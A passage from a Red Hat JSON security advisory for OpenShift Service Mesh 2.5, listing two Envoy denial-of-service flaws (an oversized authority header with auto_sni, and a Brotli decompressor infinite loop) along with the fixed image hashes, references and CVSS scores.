"text": "A flaw was found in Envoy, a cloud-native, open source edge and service proxy. When an upstream TLS cluster is used with \"auto_sni\" enabled, a request containing a \"host/:authority\" header longer than 255 characters triggers an abnormal termination of the Envoy process, leading to a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "envoy: abnormal termination when using auto_sni with authority header longer than 255 characters",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-32475"
},
{
"category": "external",
"summary": "RHBZ#2276149",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2276149"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-32475",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-32475"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-32475",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-32475"
},
{
"category": "external",
"summary": "https://github.com/envoyproxy/envoy/commit/b47fc6648d7c2dfe0093a601d44cb704b7bad382",
"url": "https://github.com/envoyproxy/envoy/commit/b47fc6648d7c2dfe0093a601d44cb704b7bad382"
},
{
"category": "external",
"summary": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-3mh5-6q8v-25wj",
"url": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-3mh5-6q8v-25wj"
}
],
"release_date": "2024-04-18T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:53+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7725"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "envoy: abnormal termination when using auto_sni with authority header longer than 255 characters"
},
{
"cve": "CVE-2024-32976",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2024-05-24T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2283145"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Envoy\u0027s Brotli decompressor. This flaw allows a remote, unauthenticated attacker to trigger an infinite loop, causing a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "envoy: Brotli decompressor infinite loop",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-32976"
},
{
"category": "external",
"summary": "RHBZ#2283145",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2283145"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-32976",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-32976"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-32976",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-32976"
},
{
"category": "external",
"summary": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-7wp5-c2vq-4f8m",
"url": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-7wp5-c2vq-4f8m"
}
],
"release_date": "2024-06-04T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:53+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
